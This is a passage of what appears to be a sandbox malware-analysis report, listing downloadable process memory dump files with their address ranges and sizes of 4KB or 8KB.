memory/2788-596-0x000001D0E8648000-0x000001D0E8649000-memory.dmp

Filesize
4KB

Download
memory/2788-218-0x000001D0E8640000-0x000001D0E8642000-memory.dmp

Filesize
8KB

Download
memory/2788-396-0x000001D0E8646000-0x000001D0E8648000-memory.dmp

Filesize
8KB

Download
memory/3080-191-0x000001F9FEB10000-0x000001F9FEB12000-memory.dmp

Filesize
8KB

Download
memory/3080-199-0x000001F9FEB13000-0x000001F9FEB15000-memory.dmp

Filesize
8KB

Download
memory/3080-550-0x000001F9FEB18000-0x000001F9FEB19000-memory.dmp

Filesize
4KB

Download
memory/3080-279-0x000001F9FEB16000-0x000001F9FEB18000-memory.dmp

Filesize
8KB

Download
memory/3732-184-0x0000019B6FAB0000-0x0000019B6FAB2000-memory.dmp

Filesize
8KB

Download
memory/3732-577-0x0000019B6FAB8000-0x0000019B6FAB9000-memory.dmp

Filesize
4KB

Download
memory/3732-308-0x0000019B6FAB6000-0x0000019B6FAB8000-memory.dmp

Filesize
8KB

Download
memory/3732-190-0x0000019B6FAB3000-0x0000019B6FAB5000-memory.dmp

Filesize
8KB

Download
memory/3876-214-0x00000207D6660000-0x00000207D6662000-memory.dmp

Filesize
8KB

Download
memory/3876-222-0x00000207D6663000-0x00000207D6665000-memory.dmp

Filesize
8KB

Download
memory/3876-587-0x00000207D6668000-0x00000207D6669000-memory.dmp

Filesize
4KB

Download
memory/3876-363-0x00000207D6666000-0x00000207D6668000-memory.dmp

Filesize
8KB

Download
memory/4164-600-0x000002091A008000-0x000002091A009000-memory.dmp

Filesize
4KB

Download
memory/4164-228-0x000002091A003000-0x000002091A005000-memory.dmp

Filesize
8KB

Download
memory/4164-430-0x000002091A006000-0x000002091A008000-memory.dmp

Filesize
8KB

Download
memory/4164-227-0x000002091A000000-0x000002091A002000-memory.dmp

Filesize
8KB

Download
memory/4280-597-0x0000022DB6308000-0x0000022DB6309000-memory.dmp

Filesize
4KB

Download
memory/4280-436-0x0000022DB6306000-0x0000022DB6308000-memory.dmp

Filesize
8KB

Download
memory/4280-263-0x0000022DB6303000-0x0000022DB6305000-memory.dmp

Filesize
8KB

Download
memory/4280-260-0x0000022DB6300000-0x0000022DB6302000-memory.dmp

Filesize
8KB

Download
memory/4424-601-0x000001E877288000-0x000001E877289000-memory.dmp

Filesize
4KB

Download
memory/4424-434-0x000001E877286000-0x000001E877288000-memory.dmp

Filesize
8KB

Download
memory/4424-269-0x000001E877283000-0x000001E877285000-memory.dmp

Filesize
8KB

Download
memory/4424-267-0x000001E877280000-0x000001E877282000-memory.dmp

Filesize
8KB

Download
memory/4548-477-0x0000017F7E366000-0x0000017F7E368000-memory.dmp

Filesize
8KB

Download
memory/4548-603-0x0000017F7E368000-0x0000017F7E369000-memory.dmp

Filesize
4KB

Download
memory/4548-272-0x0000017F7E360000-0x0000017F7E362000-memory.dmp

Filesize
8KB

Download
memory/4548-276-0x0000017F7E363000-0x0000017F7E365000-memory.dmp

Filesize
8KB

Download